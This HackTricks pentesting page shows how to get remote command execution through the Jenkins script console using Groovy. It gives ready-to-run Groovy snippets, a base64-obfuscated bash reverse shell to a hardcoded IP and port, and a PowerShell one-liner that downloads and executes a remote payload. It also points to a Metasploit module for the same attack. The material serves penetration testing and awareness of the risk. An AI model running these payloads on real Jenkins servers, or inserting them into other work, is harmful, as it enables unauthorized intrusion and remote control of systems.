Jenkins RCE with Groovy Script

Reading time: 2 minutes

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Jenkins RCE with Groovy Script

Reading time: 2 minutes

This is less noisy than creating a new project in Jenkins

  1. Go to path_jenkins/script
  2. Inside the text box introduce the script
python
def process = "PowerShell.exe <WHATEVER>".execute() println "Found text ${process.text}"

You could execute a command using: cmd.exe /c dir

In linux you can do: "ls /".execute().text

If you need to use quotes and single quotes inside the text. You can use """PAYLOAD""" (triple double quotes) to execute the payload.

Another useful groovy script is (replace [INSERT COMMAND]):

python
def sout = new StringBuffer(), serr = new StringBuffer() def proc = '[INSERT COMMAND]'.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr"

Reverse shell in linux

Reading time: 2 minutes

python
def sout = new StringBuffer(), serr = new StringBuffer() def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr"

Reverse shell in windows

Reading time: 2 minutes

You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it:

python
scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')" echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0 cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>

Script

Reading time: 2 minutes

You can automate this process with this script.

You can use MSF to get a reverse shell:

msf> use exploit/multi/http/jenkins_script_console

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks